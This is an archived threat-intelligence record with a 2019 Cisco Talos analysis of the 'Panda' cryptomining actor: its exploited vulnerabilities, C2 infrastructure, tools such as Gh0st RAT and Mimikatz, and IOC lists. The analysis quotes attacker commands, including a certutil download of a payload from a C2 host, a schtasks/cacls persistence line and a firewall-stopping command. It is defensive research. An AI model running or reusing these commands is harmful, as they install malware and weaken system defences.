{ "id": "fd4ce530-e3ee-4c31-9450-5abb3bdb18ce", "created_at": "2026-04-06T00:17:59.896991Z", "updated_at": "2026-04-10T13:11:41.257056Z", "deleted_at": null, "sha1_hash": "61ac8f21bfe03ac9d3446a71584a92a9a8da0730", "title": "Cryptocurrency miners aren’t dead yet: Documenting the voracious but simple “Panda”", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 583745, "plain_text": "Cryptocurrency miners aren’t dead yet: Documenting the voracious but\r\nsimple “Panda”\r\nBy Nick Biasini\r\nPublished: 2019-09-17 · Archived: 2026-04-05 21:27:40 UTC\r\nTuesday, September 17, 2019 11:09\r\nBy Christopher Evans and David Liebenberg.\r\nExecutive summary A new threat actor named \"Panda\" has generated thousands of\r\ndollars worth of the Monero cryptocurrency through the use of remote access tools (RATs)\r\nand illicit cryptocurrency-mining malware. This is far from the most sophisticated actor\r\nwe've ever seen, but it still has been one of the most active attackers we've seen in Cisco\r\nTalos threat trap data. Panda's willingness to persistently exploit vulnerable web\r\napplications worldwide, their tools allowing them to traverse throughout networks, and\r\ntheir use of RATs, means that organizations worldwide are at risk of having their system\r\nresources misused for mining purposes or worse, such as exfiltration of valuable\r\ninformation.\r\nPanda has shown time and again they will update their infrastructure and exploits on the fly as security researchers publicize\r\nindicators of compromises and proof of concepts. Our threat traps show that Panda uses exploits previously used by Shadow\r\nBrokers — a group infamous for publishing information from the National Security Agency — and Mimikatz, an open-source credential-dumping program.\r\nTalos first became aware of Panda in the summer of 2018, when they were engaging in the successful and widespread\r\n\"MassMiner\" campaign. Shortly thereafter, we linked Panda to another widespread illicit mining campaign with a different\r\nset of command and control (C2) servers. Since then, this actor has updated its infrastructure, exploits and payloads. We\r\nbelieve Panda is a legitimate threat capable of spreading cryptocurrency miners that can use up valuable computing\r\nresources and slow down networks and systems. Talos confirmed that organizations in the banking, healthcare,\r\ntransportation, telecommunications, IT services industries were affected in these campaigns.\r\nhttps://blog.talosintelligence.com/2019/09/panda-evolution.html\r\nPage 1 of 9\n\nFirst sightings of the not-so-elusive Panda We first observed this actor in July of 2018\r\nexploiting a WebLogic vulnerability (CVE-2017-10271) to drop a miner that was\r\nassociated with a campaign called \"MassMiner\" through the wallet, infrastructure, and\r\npost-exploit PowerShell commands used.\r\nPanda used massscan to look for a variety of different vulnerable servers and then exploited several different vulnerabilities,\r\nincluding the aforementioned Oracle bug and a remote code execution vulnerability in Apache Struts 2 (CVE-2017-5638).\r\nThey used PowerShell post-exploit to download a miner payload called \"downloader.exe,\" saving it in the TEMP folder\r\nunder a simple number filename such as \"13.exe\" and executing it. The sample attempts to download a config file from\r\nlist[.]idc3389[.]top over port 57890, as well as kingminer[.]club. The config file specifies the Monero wallet to be used as\r\nwell as the mining pool. In all, we estimate that Panda has amassed an amount of Monero that is currently valued at roughly\r\n$100,000.\r\nhttps://blog.talosintelligence.com/2019/09/panda-evolution.html\r\nPage 2 of 9\n\nBy October 2018, the config file on list[.]idc3389[.]top, which was then an instance of an HttpFileServer (HFS), had been\r\ndownloaded more than 300,000 times.\r\nThe sample also installs Gh0st RAT, which communicates with the domain rat[.]kingminer[.]club. In several samples, we\r\nalso observed Panda dropping other hacking tools and exploits. This includes the credential-theft tool Mimikatz and UPX-packed artifacts related to the Equation Group set of exploits. The samples also appear to scan for open SMB ports by\r\nreaching out over port 445 to IP addresses in the 172.105.X.X block.\r\nOne of Panda's C2 domains, idc3389[.]top, was registered to a Chinese-speaking actor, who went by the name \"Panda.\"\r\nBulehero connection Around the same time that we first observed these initial Panda\r\nattacks, we observed very similar TTPs in an attack using another C2 domain:\r\nbulehero[.]in. The actors used PowerShell to download a file called \"download.exe\" from\r\nb[.]bulehero[.]in, and similarly, save it as another simple number filename such as\r\n\"13.exe\" and execute it. The file server turned out to be an instance of HFS hosting four\r\nmalicious files.\r\nhttps://blog.talosintelligence.com/2019/09/panda-evolution.html\r\nPage 3 of 9\n\nRunning the sample in our sandboxes, we observed several elements that connect it to the earlier MassMiner campaign.\r\nFirst, it issues a GET request for a file called cfg.ini hosted on a different subdomain of bulehero[.]in, c[.]bulehero[.]in, over\r\nthe previously observed port 57890. Consistent with MassMiner, the config file specifies the site from which the original\r\nsample came, as well as the wallet and mining pool to be used for mining.\r\nAdditionally, the sample attempts to shut down the victim's firewall with commands such as \"cmd /c net stop MpsSvc\". The\r\nmalware also modifies the access control list to grant full access to certain files through running cacsl.exe.\r\nFor example:\r\ncmd /c schtasks /create /sc minute /mo 1 /tn \"Netframework\" /ru system /tr \"cmd /c echo Y|cacls\r\nC:\\Windows\\appveif.exe /p everyone:F\r\nBoth of these behaviors have also been observed in previous MassMiner infections.\r\nThe malware also issues a GET request to Chinese-language IP geolocation service ip138[.]com for a resource named ic.asp\r\nwhich provides the machine's IP address and location in Chinese. This behavior was also observed in the MassMiner\r\ncampaign.\r\nAdditionally, appveif.exe creates a number of files in the system directory. Many of these files were determined to be\r\nmalicious by multiple AV engines and appear to match the exploits of vulnerabilities targeted in the MassMiner campaign.\r\nFor instance, several artifacts were detected as being related to the \"Shadow Brokers\" exploits and were installed in a\r\nsuspiciously named directory: \"\\Windows\\InfusedAppe\\Eternalblue139\\specials\\\".\r\nEvolution of Panda In January of 2019, Talos analysts observed Panda exploiting a\r\nrecently disclosed vulnerability in the ThinkPHP web framework (CNVD-2018-24942) in\r\norder to spread similar malware. ThinkPHP is an open-source web framework popular in\r\nChina.\r\nPanda used this vulnerability to both directly download a file called \"download.exe\" from a46[.]bulehero[.]in and upload a\r\nsimple PHP web shell to the path \"/public/hydra.php\", which is subsequently used to invoke PowerShell to download the\r\nsame executable file. The web shell provides only the ability to invoke arbitrary system commands through URL parameters\r\nin an HTTP request to \"/public/hydra.php\". Download.exe would download the illicit miner payload and also engages in\r\nSMB scanning, evidence of Panda's attempt to move laterally within compromised organizations.\r\nIn March 2019, we observed the actor leveraging new infrastructure, including various subdomains of the domain\r\nhognoob[.]se. At the time, the domain hosting the initial payload, fid[.]hognoob[.]se, resolved to the IP address\r\n195[.]128[.]126[.]241, which was also associated with several subdomains of bulehero[.]in.\r\nhttps://blog.talosintelligence.com/2019/09/panda-evolution.html\r\nPage 4 of 9\n\nAt the time, the actor's tactics, techniques, and procedures (TTPs) remained similar to those used before. Post-exploit, Panda\r\ninvokes PowerShell to download an executable called \"download.exe\" from the URL\r\nhxxp://fid[.]hognoob[.]se/download.exe and save it in the Temp folder, although Panda now saved it under a high-entropy\r\nfilename i.e. 'C:/Windows/temp/autzipmfvidixxr7407.exe'. This file then downloads a Monero mining trojan named\r\n\"wercplshost.exe\" from fid[.]hognoob[.]se as well as a configuration file called \"cfg.ini\" from uio[.]hognoob[.]se, which\r\nprovides configuration details for the miner.\r\n\"Wercplshost.exe\" contains exploit modules designed for lateral movement, many of which are related to the \"Shadow\r\nBrokers\" exploits, and engages in SMB brute-forcing. The sample acquires the victim's internal IP and reaches out to\r\nChinese-language IP geolocation site 2019[.]ip138[.]com to get the external IP, using the victim's Class B address as a basis\r\nfor port scanning. It also uses the open-source tool Mimikatz to collect victim passwords.\r\nSoon thereafter, Panda began leveraging an updated payload. Some of the new features of the payload include using Certutil\r\nto download the secondary miner payload through the command: \"certutil.exe -urlcache -split -f\r\nhttp://fid[.]hognoob[.]se/upnpprhost.exe C:\\Windows\\Temp\\upnpprhost.exe\". The coinminer is also run using the command\r\n\"cmd /c ping 127.0.0.1 -n 5 \u0026 Start C:\\Windows\\ugrpkute\\[filename].exe\".\r\nThe updated payload still includes exploit modules designed for lateral movement, many of which are related to the\r\n\"Shadow Brokers\" exploits. One departure, however, is previously observed samples acquire the victim's internal IP and\r\nreach out to Chinese-language IP geolocation site 2019[.]ip138[.]com to get the external IP, using the victim's Class B\r\naddress as a basis for port scanning. This sample installs WinPcap and open-source tool Masscan and scans for open ports on\r\npublic IP addresses saving the results to \"Scant.txt\" (note the typo). The sample also writes a list of hardcoded IP ranges to\r\n\"ip.txt\" and passes it to Masscan to scan for port 445 and saves the results to \"results.txt.\" This is potentially intended to find\r\nmachines vulnerable to MS17-010, given the actor's history of using EternalBlue. The payload also leverages previously-used tools, launching Mimikatz to collect victim passwords\r\nIn June, Panda began targeting a newer WebLogic vulnerability, CVE-2019-2725, but their TTPs remained the same.\r\nRecent activity Panda began employing new C2 and payload-hosting infrastructure over\r\nthe past month. We observed several attacker IPs post-exploit pulling down payloads from\r\nthe URL hxxp[:]//wiu[.]fxxxxxxk[.]me/download.exe and saving it under a random 20-\r\ncharacter name, with the first 15 characters consisting of \"a\" - \"z\" characters and the last\r\nfive consisting of digits (e.g., \"xblzcdsafdmqslz19595.exe\"). Panda then executes the file\r\nvia PowerShell. Wiu[.]fxxxxxxk[.]me resolves to the IP 3[.]123[.]17[.]223, which is\r\nassociated with older Panda C2s including a46[.]bulehero[.]in and fid[.]hognoob[.]se.\r\nBesides the new infrastructure, the payload is relatively similar to the one they began using in May 2019, including using\r\nCertutil to download the secondary miner payload located at hxxp[:]//wiu[.]fxxxxxxk[.]me/sppuihost.exe and using ping to\r\ndelay execution of this payload. The sample also includes Panda's usual lateral movement modules that include Shadow\r\nBrokers' exploits and Mimikatz.\r\nOne difference is that several samples contained a Gh0st RAT default mutex \"DOWNLOAD_SHELL_MUTEX_NAME\"\r\nwith the mutex name listed as fxxk[.]noilwut0vv[.]club:9898. The sample also made a DNS request for this domain. The\r\nhttps://blog.talosintelligence.com/2019/09/panda-evolution.html\r\nPage 5 of 9\n\ndomain resolved to the IP 46[.]173[.]217[.]80, which is also associated with several subdomains of fxxxxxxk[.]me and older\r\nPanda C2 hognoob[.]se. Combining mining capabilities and Gh0st RAT represents a return to Panda's earlier behavior.\r\nOn August 19, 2019, we observed that Panda has added another set of domains to his inventory of C2 and payload-hosting\r\ninfrastructure. In line with his previous campaigns, we observed multiple attacker IPs pulling down payloads from the URL\r\nhxxp[:]//cb[.]f*ckingmy[.]life/download.exe. In a slight departure from previous behavior, the file was saved as \"BBBBB,\",\r\ninstead of as a random 20-character name. cb[.]f*ckingmy[.]life (URL censored due to inappropriate language) currently\r\nresolves to the IP 217[.]69[.]6[.]42, and was first observed by Cisco Umbrella on August 18.\r\nIn line with previous samples Talos has analyzed over the summer, the initial payload uses Certutil to download the\r\nsecondary miner payload located at http[:]//cb[.]fuckingmy[.]life:80/trapceapet.exe. This sample also includes a Gh0st RAT\r\nmutex, set to \"oo[.]mygoodluck[.]best:51888:WervPoxySvc\", and made a DNS request for this domain. The domain\r\nresolved to 46[.]173[.]217[.]80, which hosts a number of subdomains of fxxxxxxk[.]me and hognoob[.]se, both of which are\r\nknown domains used by Panda. The sample also contacted li[.]bulehero2019[.]club.\r\nCisco Threat Grid's analysis also showed artifacts associated with Panda's typical lateral movement tools that include\r\nShadow Brokers exploits and Mimikatz. The INI file used for miner configuration lists the mining pool as mi[.]oops[.]best,\r\nwith a backup pool at mx[.]oops[.]best.\r\nConclusion Panda's operational security remains poor, with many of their old and current\r\ndomains all hosted on the same IP and their TTPs remaining relatively similar throughout\r\ncampaigns. The payloads themselves are also not very sophisticated.\r\nHowever, system administrators and researchers should never underestimate the damage an actor can do with widely\r\navailable tools such as Mimikatz. Some information from HFS used by Panda shows that this malware had a wide reach and\r\nrough calculations on the amount of Monero generated show they made around 1,215 XMR in profits through their\r\nmalicious activities, which today equals around $100,000, though the amount of realized profits is dependent on the time\r\nthey sold.\r\nPanda remains one of the most consistent actors engaging in illicit mining attacks and frequently shifts the infrastructure\r\nused in their attacks. They also frequently update their targeting, using a variety of exploits to target multiple vulnerabilities,\r\nand is quick to start exploiting known vulnerabilities shortly after public POCs become available, becoming a menace to\r\nanyone slow to patch. And, if a cryptocurrency miner is able to infect your system, that means another actor could use the\r\nhttps://blog.talosintelligence.com/2019/09/panda-evolution.html\r\nPage 6 of 9\n\nsame infection vector to deliver other malware. Panda remains an active threat and Talos will continue to monitor their\r\nactivity in order to thwart their operations.\r\nAdvanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.\r\nCisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites\r\nand detects malware used in these attacks.\r\nNetwork Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System\r\n(NGIPS), and Meraki MX can detect malicious activity associated with this threat.\r\nAMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.\r\nUmbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether\r\nusers are on or off the corporate network.\r\nOpen Source SNORTⓇ Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for\r\npurchase on Snort.org.\r\nIOCs\r\nDomains a45[.]bulehero[.]in\r\na46[.]bulehero[.]in\r\na47[.]bulehero[.]in\r\na48[.]bulehero[.]in\r\na88[.]bulehero[.]in\r\na88[.]heroherohero[.]info\r\na[.]bulehero[.]in\r\naic[.]fxxxxxxk[.]me\r\naxx[.]bulehero[.]in\r\nb[.]bulehero[.]in\r\nbulehero[.]in\r\nc[.]bulehero[.]in\r\ncb[.]fuckingmy[.].life\r\ncnm[.]idc3389[.]top\r\ndown[.]idc3389[.]top\r\nfid[.]hognoob[.]se\r\nfxxk[.]noilwut0vv[.]club\r\nhaq[.]hognoob[.]se\r\nidc3389[.]top\r\nidc3389[.]cc\r\nidc3389[.]pw\r\nhttps://blog.talosintelligence.com/2019/09/panda-evolution.html\r\nPage 7 of 9\n\nli[.]bulehero2019[.]club\r\nlist[.]idc3389[.]top\r\nmi[.]oops[.]best\r\nmx[.]oops[.]best\r\nnrs[.]hognoob[.]se\r\noo[.]mygoodluck[.]best\r\npool[.]bulehero[.]in\r\npxi[.]hognoob[.]se\r\npxx[.]hognoob[.]se\r\nq1a[.]hognoob[.]se\r\nqie[.]fxxxxxxk[.]me\r\nrp[.]oiwcvbnc2e[.]stream\r\nuio[.]heroherohero[.]info\r\nuio[.]hognoob[.]se\r\nupa1[.]hognoob[.]se\r\nupa2[.]hognoob[.]se\r\nwiu[.]fxxxxxxk[.]me\r\nyxw[.]hognoob[.]se\r\nzik[.]fxxxxxxk[.]me\r\nIPs 184[.]168[.]221[.]47\r\n172[.]104[.]87[.]6\r\n139[.]162[.]123[.]87\r\n139[.]162[.]110[.]201\r\n116[.]193[.]154[.]122\r\n95[.]128[.]126[.]241\r\n195[.]128[.]127[.]254\r\n195[.]128[.]126[.]120\r\n195[.]128[.]126[.]243\r\n195[.]128[.]124[.]140\r\n139[.]162[.]71[.]92\r\n3[.]123[.]17[.]223\r\n46[.]173[.]217[.]80\r\n5[.]56[.]133[.]246\r\nSHA-256 2df8cfa5ea4d63615c526613671bbd02cfa9ddf180a79b4e542a2714ab02a3c1\r\nfa4889533cb03fc4ade5b9891d4468bac9010c04456ec6dd8c4aba44c8af9220\r\n2f4d46d02757bcf4f65de700487b667f8846c38ddb50fbc5b2ac47cfa9e29beb\r\n829729471dfd7e6028af430b568cc6e812f09bb47c93f382a123ccf3698c8c08\r\n8b645c854a3bd3c3a222acc776301b380e60b5d0d6428db94d53fad6a98fc4ec\r\n1e4f93a22ccbf35e2f7c4981a6e8eff7c905bc7dbb5fedadd9ed80768e00ab27\r\n0697127fb6fa77e80b44c53d2a551862709951969f594df311f10dcf2619c9d5\r\nf9a972757cd0d8a837eb30f6a28bc9b5e2a6674825b18359648c50bbb7d6d74a\r\n34186e115f36584175058dac3d34fe0442d435d6e5f8c5e76f0a3df15c9cd5fb\r\n29b6dc1a00fea36bc3705344abea47ac633bc6dbff0c638b120d72bc6b38a36f\r\n3ed90f9fbc9751a31bf5ab817928d6077ba82113a03232682d864fb6d7c69976\r\na415518642ce4ad11ff645151195ca6e7b364da95a8f89326d68c836f4e2cae1\r\n4d1f49fac538692902cc627ab7d9af07680af68dd6ed87ab16710d858cc4269c\r\n8dea116dd237294c8c1f96c3d44007c3cd45a5787a2ef59e839c740bf5459f21\r\n991a9a8da992731759a19e470c36654930f0e3d36337e98885e56bd252be927e\r\nhttps://blog.talosintelligence.com/2019/09/panda-evolution.html\r\nPage 8 of 9\n\na3f1c90ce5c76498621250122186a0312e4f36e3bfcfede882c83d06dd286da1\r\n9c37a6b2f4cfbf654c0a5b4a4e78b5bbb3ba26ffbfab393f0d43dad9000cb2d3\r\nd5c1848ba6fdc6f260439498e91613a5db8acbef10d203a18f6b9740d2cab3ca\r\n29b6dc1a00fea36bc3705344abea47ac633bc6dbff0c638b120d72bc6b38a36f\r\n6d5479adcfa4c31ad565ab40d2ea8651bed6bd68073c77636d1fe86d55d90c8d\r\nMonero Wallets\r\n49Rocc2niuCTyVMakjq7zU7njgZq3deBwba3pTcGFjLnB2Gvxt8z6PsfEn4sc8WPPedTkGjQVHk2RLk7btk6Js8gKv9iLC\r\n1198.851653275126\r\n4AN9zC5PGgQWtg1mTNZDySHSS79nG1qd4FWA1rVjEGZV84R8BqoLN9wU1UCnmvu1rj89bjY4Fat1XgEiKks6Foei\r\n44qLwCLcifP4KZfkqwNJj4fTbQ8rkLCxJc3TW4UBwciZ95yWFuQD6mD4QeDusREBXMhHX9DzT5LBaWdVbsjStfjR\r\nSource: https://blog.talosintelligence.com/2019/09/panda-evolution.html\r\nhttps://blog.talosintelligence.com/2019/09/panda-evolution.html\r\nPage 9 of 9", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://blog.talosintelligence.com/2019/09/panda-evolution.html" ], "report_names": [ "panda-evolution.html" ], "threat_actors": [ { "id": "b740943a-da51-4133-855b-df29822531ea", "created_at": "2022-10-25T15:50:23.604126Z", "updated_at": "2026-04-10T02:00:05.259593Z", "deleted_at": null, "main_name": "Equation", "aliases": [ "Equation" ], "source_name": "MITRE:Equation", "tools": null, "source_id": "MITRE", "reports": null }, { "id": "d4f7cf97-9c98-409c-8b95-b80d14c576a5", "created_at": "2022-10-25T16:07:24.561104Z", "updated_at": "2026-04-10T02:00:05.03343Z", "deleted_at": null, "main_name": "Shadow Brokers", "aliases": [], "source_name": "ETDA:Shadow Brokers", "tools": [], "source_id": "ETDA", "reports": null }, { "id": "171b85f2-8f6f-46c0-92e0-c591f61ea167", "created_at": "2023-01-06T13:46:38.830188Z", "updated_at": "2026-04-10T02:00:03.114926Z", "deleted_at": null, "main_name": "The Shadow Brokers", "aliases": [ "Shadow Brokers", "ShadowBrokers", "The ShadowBrokers", "TSB" ], "source_name": "MISPGALAXY:The Shadow Brokers", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "08623296-52be-4977-8622-50efda44e9cc", "created_at": "2023-01-06T13:46:38.549387Z", "updated_at": "2026-04-10T02:00:03.020003Z", "deleted_at": null, "main_name": "Equation Group", "aliases": [ "Tilded Team", "EQGRP", "G0020" ], "source_name": "MISPGALAXY:Equation Group", "tools": [ "TripleFantasy", "GrayFish", "EquationLaser", "EquationDrug", "DoubleFantasy" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "2d9fbbd7-e4c3-40e5-b751-27af27c8610b", "created_at": "2024-05-01T02:03:08.144214Z", "updated_at": "2026-04-10T02:00:03.674763Z", "deleted_at": null, "main_name": "PLATINUM COLONY", "aliases": [ "Equation Group " ], "source_name": "Secureworks:PLATINUM COLONY", "tools": [ "DoubleFantasy", "EquationDrug", "EquationLaser", "Fanny", "GrayFish", "TripleFantasy" ], "source_id": "Secureworks", "reports": null }, { "id": "e0fed6e6-a593-4041-80ef-694261825937", "created_at": "2022-10-25T16:07:23.593572Z", "updated_at": "2026-04-10T02:00:04.680752Z", "deleted_at": null, "main_name": "Equation Group", "aliases": [ "APT-C-40", "G0020", "Platinum Colony", "Tilded Team" ], "source_name": "ETDA:Equation Group", "tools": [ "Bvp47", "DEMENTIAWHEEL", "DOUBLEFANTASY", "DanderSpritz", "DarkPulsar", "DoubleFantasy", "DoubleFeature", "DoublePulsar", "Duqu", "EQUATIONDRUG", "EQUATIONLASER", "EQUESTRE", "Flamer", "GRAYFISH", "GROK", "OddJob", "Plexor", "Prax", "Regin", "Skywiper", "TRIPLEFANTASY", "Tilded", "UNITEDRAKE", "WarriorPride", "sKyWIper" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434679, "ts_updated_at": 1775826701, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/61ac8f21bfe03ac9d3446a71584a92a9a8da0730.pdf", "text": "https://archive.orkl.eu/61ac8f21bfe03ac9d3446a71584a92a9a8da0730.txt", "img": "https://archive.orkl.eu/61ac8f21bfe03ac9d3446a71584a92a9a8da0730.jpg" } }